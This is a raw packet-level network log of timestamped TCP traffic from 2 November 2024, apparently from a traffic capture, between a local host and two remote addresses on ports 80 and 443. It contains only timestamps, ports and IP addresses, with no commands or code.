                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.942490101 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.942517042 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.942600965 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.942765951 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.942778111 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.942787886 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.942810059 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.942856073 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.942867041 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.942883015 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.942893982 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.942895889 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.942905903 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.942914963 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.942917109 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.942943096 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.942969084 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.942979097 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.942994118 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943006992 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943016052 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943018913 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943043947 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943069935 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943080902 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943090916 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943103075 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943120956 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943125963 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943135977 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943147898 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943159103 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943166971 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943171024 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943178892 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943188906 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943201065 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943205118 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943213940 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943221092 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943223953 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943233967 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943247080 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943278074 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943280935 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943316936 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943363905 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943371058 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943408012 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943418026 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943433046 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943444967 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943454981 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943455935 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943468094 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943479061 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943484068 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943490982 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943495035 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943505049 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943521023 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943552017 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943701982 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943711042 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943727016 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943737984 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943751097 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943754911 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943789959 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943814039 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943823099 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943866014 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943873882 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943883896 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943896055 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943907022 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943912983 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943919897 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943929911 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943933964 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.943957090 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944025040 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944036007 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944052935 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944063902 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944067955 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944075108 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944103956 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944119930 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944139004 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944149971 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944159031 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944171906 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944185972 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944190979 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944200993 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944214106 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944216013 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944228888 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944231033 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944241047 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944251060 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944266081 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944268942 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944276094 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944293022 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944312096 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944318056 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944387913 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944401026 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944411039 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944427013 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944434881 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944437027 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944448948 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944463968 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944477081 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944605112 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944613934 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944623947 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944638968 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944652081 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944679022 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944765091 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944773912 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944785118 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944799900 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944806099 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944813013 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944818974 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944823980 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944835901 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944844961 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944847107 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944858074 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944869041 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944870949 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944880009 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944889069 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944891930 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944906950 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944916964 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944926023 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944927931 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944938898 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944953918 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944964886 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944967031 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944977999 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.944988012 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.945003033 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.945029020 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.945099115 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.945110083 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.945120096 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.945128918 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.945141077 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.945142984 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.945151091 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.945163012 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.945173979 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.945182085 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.945192099 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.945208073 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.981460094 CET4436381013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.981611967 CET4436381013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.981666088 CET63810443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.981858015 CET63810443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.981862068 CET4436381013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.981869936 CET63810443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.981873035 CET4436381013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.983278036 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.983290911 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.983303070 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.983330011 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.983625889 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.983637094 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.983671904 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.985527039 CET63816443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.985559940 CET4436381613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.985622883 CET63816443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.985770941 CET63816443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.985785007 CET4436381613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.988550901 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.988624096 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.988668919 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.988677979 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.988706112 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.988715887 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.988723040 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.988725901 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.988748074 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.988763094 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.988781929 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.988864899 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.988876104 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.988887072 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.988897085 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.988909006 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.988913059 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.988924026 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.988933086 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.988936901 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.988948107 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.988970995 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.988974094 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.988981009 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.988996029 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.989017963 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.989018917 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.989028931 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.989062071 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.989088058 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.989097118 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:11.989128113 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.055104017 CET4436381113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.055214882 CET4436381113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.055258989 CET63811443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.055382967 CET63811443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.055382967 CET63811443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.055394888 CET4436381113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.055402994 CET4436381113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.057586908 CET63817443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.057677031 CET4436381713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.057740927 CET63817443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.057919025 CET63817443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.057966948 CET4436381713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.063926935 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.063949108 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.063961029 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.063971043 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.063977003 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.063988924 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.063998938 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.064011097 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.064021111 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.064032078 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.064038992 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.064042091 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.064058065 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.064074039 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.064074993 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.064089060 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.064095974 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.064099073 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.064105034 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.064116001 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.064116955 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.064129114 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.064138889 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.064141035 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.064150095 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.064160109 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.064171076 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.064171076 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.064181089 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.064182997 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.064192057 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.064202070 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.064203024 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.064213991 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.064220905 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.064229965 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.064241886 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.064243078 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.064251900 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.064264059 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.064275026 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.064275980 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.064284086 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.064306021 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.064342976 CET8063806208.109.77.116192.168.2.4
